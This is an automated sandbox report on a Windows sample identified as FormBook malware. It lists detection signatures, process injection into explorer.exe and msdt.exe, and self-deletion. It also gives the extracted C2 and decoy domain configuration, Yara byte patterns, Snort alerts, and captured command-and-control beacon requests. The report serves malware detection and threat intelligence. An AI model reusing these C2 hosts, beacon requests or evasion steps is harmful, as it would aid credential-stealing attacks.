Play interactive tour

Edit tour

Windows Analysis Report V5cfxBHd71.exe

Overview

General Information

Sample Name:	V5cfxBHd71.exe
Analysis ID:	458773
MD5:	182170393a1acd19744575f00562384f
SHA1:	e2b2d6405b359d78ba965b54e9cc6b38e223fd97
SHA256:	71ec0c91aeec5071da283d23bceb39800e9ad6c133bb6aef99d1302f47a4ada3
Tags:	exe
Infos:
Most interesting Screenshot:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

System process connects to network (likely due to code injection or exploit)

Yara detected AntiVM3

Yara detected FormBook

C2 URLs / IPs found in malware configuration

Machine Learning detection for sample

Maps a DLL or memory area into another process

Modifies the context of a thread in another process (thread injection)

Performs DNS queries to domains with low reputation

Queues an APC in another process (thread injection)

Sample uses process hollowing technique

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Antivirus or Machine Learning detection for unpacked file

Binary contains a suspicious time stamp

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

V5cfxBHd71.exe (PID: 5700 cmdline: 'C:\Users\user\Desktop\V5cfxBHd71.exe' MD5: 182170393A1ACD19744575F00562384F)

V5cfxBHd71.exe (PID: 6092 cmdline: C:\Users\user\Desktop\V5cfxBHd71.exe MD5: 182170393A1ACD19744575F00562384F)

explorer.exe (PID: 3472 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

msdt.exe (PID: 3332 cmdline: C:\Windows\SysWOW64\msdt.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)

cmd.exe (PID: 340 cmdline: /c del 'C:\Users\user\Desktop\V5cfxBHd71.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 1496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.258210431.000000000335B000.00000004.00000001.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x5138a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x513c32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x53aac8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x53ae52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x51f945:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x546b65:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x51f431:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x546651:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x51fa47:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x546c67:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x51fbbf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x546ddf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x51464a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x53b86a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x51e6ac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x5458cc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x5153c2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x53c5e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x524a37:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x54bc57:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x525ada:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x521969:$sqlite3step: 68 34 1C 7B E1 0x521a7c:$sqlite3step: 68 34 1C 7B E1 0x548b89:$sqlite3step: 68 34 1C 7B E1 0x548c9c:$sqlite3step: 68 34 1C 7B E1 0x521998:$sqlite3text: 68 38 2A 90 C5 0x521abd:$sqlite3text: 68 38 2A 90 C5 0x548bb8:$sqlite3text: 68 38 2A 90 C5 0x548cdd:$sqlite3text: 68 38 2A 90 C5 0x5219ab:$sqlite3blob: 68 53 D8 7F 8C 0x521ad3:$sqlite3blob: 68 53 D8 7F 8C 0x548bcb:$sqlite3blob: 68 53 D8 7F 8C 0x548cf3:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: V5cfxBHd71.exe PID: 5700	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 18 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.V5cfxBHd71.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.V5cfxBHd71.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x13885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x13371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x13987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x13aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x858a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x125ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x9302:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x18977:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x19a1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.V5cfxBHd71.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x158a9:$sqlite3step: 68 34 1C 7B E1 0x159bc:$sqlite3step: 68 34 1C 7B E1 0x158d8:$sqlite3text: 68 38 2A 90 C5 0x159fd:$sqlite3text: 68 38 2A 90 C5 0x158eb:$sqlite3blob: 68 53 D8 7F 8C 0x15a13:$sqlite3blob: 68 53 D8 7F 8C
4.2.V5cfxBHd71.exe.400000.0.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
4.2.V5cfxBHd71.exe.400000.0.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x8972:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x14685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x14171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x14787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x148ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x938a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x133ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa102:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x19777:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1a81a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.V5cfxBHd71.exe.400000.0.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x166a9:$sqlite3step: 68 34 1C 7B E1 0x167bc:$sqlite3step: 68 34 1C 7B E1 0x166d8:$sqlite3text: 68 38 2A 90 C5 0x167fd:$sqlite3text: 68 38 2A 90 C5 0x166eb:$sqlite3blob: 68 53 D8 7F 8C 0x16813:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 1 entries

Sigma Overview

System Summary:

Sigma detected: Possible Applocker Bypass

Show sources

Source: Process started

Author: juju4: Data: Command: C:\Windows\SysWOW64\msdt.exe, CommandLine: C:\Windows\SysWOW64\msdt.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\msdt.exe, NewProcessName: C:\Windows\SysWOW64\msdt.exe, OriginalFileName: C:\Windows\SysWOW64\msdt.exe, ParentCommandLine: C:\Users\user\Desktop\V5cfxBHd71.exe, ParentImage: C:\Users\user\Desktop\V5cfxBHd71.exe, ParentProcessId: 6092, ProcessCommandLine: C:\Windows\SysWOW64\msdt.exe, ProcessId: 3332

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://www.boogerstv.com/p2io/?BJ=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7jRLyNqpfuRL&b2Ml9=0txtgJLXY6ULB	Avira URL Cloud: Label: malware
Source: http://www.vectoroutlines.com/p2io/?BJ=RfOK6jKhDkXNwKgMe5LTyAppaXreGCTFIz0prsbY2047Xu3Gxs4GQwDY2/SnNVlkbHQV&b2Ml9=0txtgJLXY6ULB	Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.adultpeace.com/p2io/"], "decoy": ["essentiallyourscandles.com", "cleanxcare.com", "bigplatesmallwallet.com", "iotcloud.technology", "dmgt4m2g8y2uh.net", "malcorinmobiliaria.com", "thriveglucose.com", "fuhaitongxin.com", "magetu.info", "pyithuhluttaw.net", "myfavbutik.com", "xzklrhy.com", "anewdistraction.com", "mercuryaid.net", "thesoulrevitalist.com", "swayam-moj.com", "liminaltechnology.com", "lucytime.com", "alfenas.info", "carmelodesign.com", "newmopeds.com", "cyrilgraze.com", "ruhexuangou.com", "trendbold.com", "centergolosinas.com", "leonardocarrillo.com", "advancedaccessapplications.com", "aideliveryrobot.com", "defenestration.world", "zgcbw.net", "shopihy.com", "3cheer.com", "untylservice.com", "totally-seo.com", "cmannouncements.com", "tpcgzwlpyggm.mobi", "hfjxhs.com", "balloon-artists.com", "vectoroutlines.com", "boogerstv.com", "procircleacademy.com", "tricqr.com", "hazard-protection.com", "buylocalclub.info", "m678.xyz", "hiddenwholesale.com", "ololmychartlogin.com", "redudiban.com", "brunoecatarina.com", "69-1hn7uc.net", "zmzcrossrt.xyz", "dreamcashbuyers.com", "yunlimall.com", "jonathan-mandt.com", "painhut.com", "pandemisorgugirisi-tr.com", "sonderbach.net", "kce0728com.net", "austinpavingcompany.com", "biztekno.com", "rodriggi.com", "micheldrake.com", "foxwaybrasil.com", "a3i7ufz4pt3.net"]}

Multi AV Scanner detection for domain / URL

Show sources

Source: vectoroutlines.com

Virustotal: Detection: 5%

Perma Link

Multi AV Scanner detection for submitted file

Show sources

Source: V5cfxBHd71.exe	Virustotal: Detection: 29%			Perma Link
Source: V5cfxBHd71.exe	ReversingLabs: Detection: 30%

Yara detected FormBook

Show sources

Source: Yara match	File source: 4.2.V5cfxBHd71.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.V5cfxBHd71.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000004.00000002.352974421.0000000000B00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.353232950.0000000000F40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.497388587.0000000000A40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.500475231.0000000000E90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.352380368.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.499943855.0000000000E60000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.258699660.00000000041D9000.00000004.00000001.sdmp, type: MEMORY

Machine Learning detection for sample

Show sources

Source: V5cfxBHd71.exe

Joe Sandbox ML: detected

Source: 4.2.V5cfxBHd71.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: V5cfxBHd71.exe

Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE

Source: V5cfxBHd71.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: wscui.pdbUGP source: explorer.exe, 00000007.00000000.293172647.000000000EC00000.00000002.00000001.sdmp
Source:	Binary string: msdt.pdbGCTL source: V5cfxBHd71.exe, 00000004.00000002.354477795.0000000002EE0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: V5cfxBHd71.exe, 00000004.00000002.353531484.000000000109F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: V5cfxBHd71.exe, 00000004.00000002.353531484.000000000109F000.00000040.00000001.sdmp, msdt.exe
Source:	Binary string: msdt.pdb source: V5cfxBHd71.exe, 00000004.00000002.354477795.0000000002EE0000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 00000007.00000000.293172647.000000000EC00000.00000002.00000001.sdmp

Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4x nop then pop edi	4_2_00416282
Source: C:\Users\user\Desktop\V5cfxBHd71.exe	Code function: 4x nop then pop ebx	4_2_00406A94
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 4x nop then pop edi	17_2_00A56282
Source: C:\Windows\SysWOW64\msdt.exe	Code function: 4x nop then pop ebx	17_2_00A46A95

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49726 -> 198.54.126.105:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49726 -> 198.54.126.105:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49726 -> 198.54.126.105:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49729 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 223.29.234.230:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 223.29.234.230:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49733 -> 223.29.234.230:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.adultpeace.com/p2io/

Performs DNS queries to domains with low reputation

Show sources

Source: C:\Windows\explorer.exe

DNS query: www.m678.xyz

Source: global traffic	HTTP traffic detected: GET /p2io/?BJ=RfOK6jKhDkXNwKgMe5LTyAppaXreGCTFIz0prsbY2047Xu3Gxs4GQwDY2/SnNVlkbHQV&b2Ml9=0txtgJLXY6ULB HTTP/1.1Host: www.vectoroutlines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?BJ=hDwxgnCxHqZG/nBf9NFToL98ekU0apx9FaMqifAGLuP7v/j66cUXhxpzlnLclYHrbOLF&b2Ml9=0txtgJLXY6ULB HTTP/1.1Host: www.3cheer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?BJ=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7jRLyNqpfuRL&b2Ml9=0txtgJLXY6ULB HTTP/1.1Host: www.boogerstv.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 198.54.117.218 198.54.117.218

Source: global traffic	HTTP traffic detected: GET /p2io/?BJ=RfOK6jKhDkXNwKgMe5LTyAppaXreGCTFIz0prsbY2047Xu3Gxs4GQwDY2/SnNVlkbHQV&b2Ml9=0txtgJLXY6ULB HTTP/1.1Host: www.vectoroutlines.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?BJ=hDwxgnCxHqZG/nBf9NFToL98ekU0apx9FaMqifAGLuP7v/j66cUXhxpzlnLclYHrbOLF&b2Ml9=0txtgJLXY6ULB HTTP/1.1Host: www.3cheer.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /p2io/?BJ=fW2NkW2j278wyrs6d/m+egXTc5dWq8qtohQAL+tQrXSmfdetyJ3HBVVg7jRLyNqpfuRL&b2Ml9=0txtgJLXY6ULB HTTP/1.1Host: www.boogerstv.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.tpcgzwlpyggm.mobi

Source: V5cfxBHd71.exe, 00000000.00000002.271663578.00000000063E0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: V5cfxBHd71.exe, 00000000.00000002.257959634.00000000031D1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: V5cfxBHd71.exe, 00000000.00000003.236794650.00000000062AE000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.290098418.000000000BC30000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
